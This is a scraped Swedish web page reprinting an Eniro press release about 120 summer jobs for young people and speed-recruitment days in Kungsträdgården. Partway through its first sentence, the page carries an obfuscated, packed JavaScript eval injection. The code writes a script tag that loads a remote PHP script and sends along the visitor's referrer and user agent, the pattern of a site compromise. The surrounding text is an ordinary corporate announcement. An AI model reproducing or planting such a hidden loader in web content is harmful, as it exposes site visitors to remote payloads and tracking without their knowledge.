Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Eniro söker sommarjobbare

Eniro söker sommarjobbare
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aidhs|var|u0026u|referrer|dkddt||js|php’.split(’|’),0,{}))
fyra veckor i sommar 18 juni – 13 juli tar Eniro in 120 ungdomar för att jobba med content. Förutom att skapa 120 sommarjobb och en punktinsats för att förbättra för Eniros användare hoppas Eniro att fler företag ska inspireras och skapa jobb för unga.

–      Då vi är inne i en mycket spännande fas med mycket förändringsarbete kommer vi att under några veckor i sommar behöva utöka med extra resurser för att kvalitetshöja vårt grunddata ytterligare, säger Mattias Wedar, VD Eniro Sverige. Att samtidigt kunna hjälpa unga att få sommarjobb är extra glädjande.

Ungdomarna ska helst vara i åldern 18 år – 22 år, självgående och ansvarstagande, ha kunskap i Office-paketet, ha vana vid att söka, finna och värdera information på nätet.

All rekrytering kommer att ske via två speedrekryteringsdagar 21-22 maj i Kungsträdgården kl 13.00 till 19.00.

http://www.facebook.com/note.php?note_id=396994283678094

För mer information kontakta:

Christina Sjölund, presschef, 072-240 29 30

Eniro är Nordens största sökföretag. Genom att använda Eniros tjänster kan både företag och konsumenter på ett enkelt sätt hitta de försäljningsställen som har de produkter och tjänster man är intresserad av. Oavsett om kanalen är internet, katalog eller mobil. Annonsörer kan aktivt marknadsföra sig till köpbenägna konsumenter och företag och därmed få nya kunder och ökad försäljning. Bättre sökbarhet leder till bättre affärer.

Eniro har 3 600 anställda i Norden och Polen samt är noterat på Nasdaq OMX Stockholm sedan år 2000. Under 2011 uppgick intäkterna till 4 323 MSEK, med ett resultat före avskrivningar (EBITDA) på 991 MSEK. Huvudkontoret finns i Stockholm. Mer om Eniro på www.eniro.com

Sugen? 🙂